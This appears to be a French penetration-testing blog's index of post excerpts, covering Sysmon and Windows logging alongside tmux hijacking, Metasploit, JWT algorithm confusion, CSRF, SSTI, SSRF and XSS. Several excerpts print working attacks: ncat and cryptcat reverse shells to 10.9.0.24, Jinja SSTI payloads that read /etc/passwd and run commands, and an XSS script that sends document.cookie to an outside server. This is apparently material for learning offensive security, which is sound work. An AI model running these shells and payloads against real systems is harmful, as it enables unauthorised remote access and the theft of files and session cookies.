Sysmon

L’utilitaire sysmon qui fait partie de sysinternals est un driver qui permet de monitorer un système. Cela permet d’avoir une vue détaillée des événements critiques qui se produisent lors d’intrusions dans une machine : création de processus, connexions réseau et changement à la date de création de certains fichiers. L’analyse de ces évements avec le … Continuer la lecture

TMUX session hijacking

Installation de tmux sudo apt-et install tmux #installation de tmux sous Ubuntu tmux -V #déterminer la version Les sessions tmux #crée une nouvelle session tmux new -s openvpn #crée une esssion avec le nom openvpn La barre verte en bas de l’écran indique que nous sommes dans une session tmux (le symbole * indique le … Continuer la lecture

Logs de Windows

Les logs de Windows peuvent être accédés de diverses façons Event Viewer (GUI-based application : eventvwr.msc). Observateur d’événements Wevtutil.exe (command-line tool) Get-WinEvent (PowerShell cmdlet) Liste les journaux des événements wevtutil el Lit les événements à partir d’un journal wevtutil qe Application /c:3 /rd:true /f:text   PowerShell cmdlet Get-WinEvent -FilterHashTable @{ LogName=’Application’ ProviderName=’MsiInstaller’ ID=11707 } Get-WinEvent -FilterHashtable … Continuer la lecture

Reverse shell encrypté

Netcat (nc) ne supporte l’encryption et cela permet d’être détecté facilement (firewall intelligent). Voici donc quelques façons d’améliorer la confidentialité des communications ncat apt install ncat ncat -l 443 –ssl -v ncat 10.9.0.24 –ssl -e /bin/bash -v cryptcat cryptcat -lvp 4444 -k mysecretkey rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|cryptcat 10.9.0.24 4444 -k mysecretkey >/tmp/f socat … Continuer la lecture

Quelques commandes de metasploit

Metasploit est une plateforme complète pour l’exploitation de cibles fonctionnant sur une multitude de plateformes. Tout le monde le sait. Mais metasploit peut faire beaucoup plus. Création de rapports de vulnérabilités Recherche de vulnérabilités dans un service spécifique dans un réseau entier Création d’espace de travail(workspace) pour différents projets(clients) Enregistrement dans la base de données … Continuer la lecture

Vulnérabilité dans les tokens JWT

Structure d’un token header.payload.secret Les sections sont encodés en base64 Structure d’un header {“typ”:”JWT”,”alg”:”RS256″} Si on a la clé publique du serveur, on peut réencoder le token -Changer l’algorithme dans le header par HS256 (HS256 est symétrique, rs256 est asymétrique) cat a.pem | xxd – p | tr -d “\\n” (convertit la clé publique du … Continuer la lecture

CSRF exploitation

pip3 install xsrfprobe xsrfprobe -u http://server/endpoint Vulnérabilité CSRF un fichier sur un serveur tiers, lorsque visité par une victime, permet l’exécution de code sur le serveur vulnérable (avec les droits de la victime) URL d’un image (invisible pour la victime) qui exécute du code sur un serveur vulnérable. La victime n’a fait qu’ouvrir le lien … Continuer la lecture

Vulnérabilité SSTI

SSTI (Server Side Template Injection) Pour Flask, on peut vérifier avec {{2+2}} Avec un résultat positif (4), on sait que le serveur est vulnérable. On peut essayer de lire des fichiers avec ce payload {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} ou d’exécuter du code {{config.__class__.__init__.__globals__['os'].popen(<command>).read()}} Pour une liste de payloads Il existe aussi un outil pour l’automatisation : … Continuer la lecture

Vulnérabilité SSRF

SSRF (Server Side request forgery) Par exemple, vous pouvez vous connecter à un site web qui utilise des bases de données comme elasticsearch ou mysql sur leur réseau local, mais vous ne pouvez y accéder directement. Si vous pouvez exécuter un script sur le serveur qui permet d’inclure un URL, il est possible que vous … Continuer la lecture

Exploiter les vulnérabilités XSS

Vérifier si un site est vulnérable à une faille XSS (réflexion). On entre ce code dans une boîte de recherche. Si rien n’est filtré, souvent, dans le résultat de recherche, les termes recherchés sont affichés. <script>alert("Hello")</script> <script>alert(window.location.hostname)</script> #alternative Afficher le cookie du site <script>alert(document.cookie)</script> Voler un cookie <script>document.location='http://www.searchevolution.com/log/'+document.cookie</script> Changer le contenu de la page web … Continuer la lecture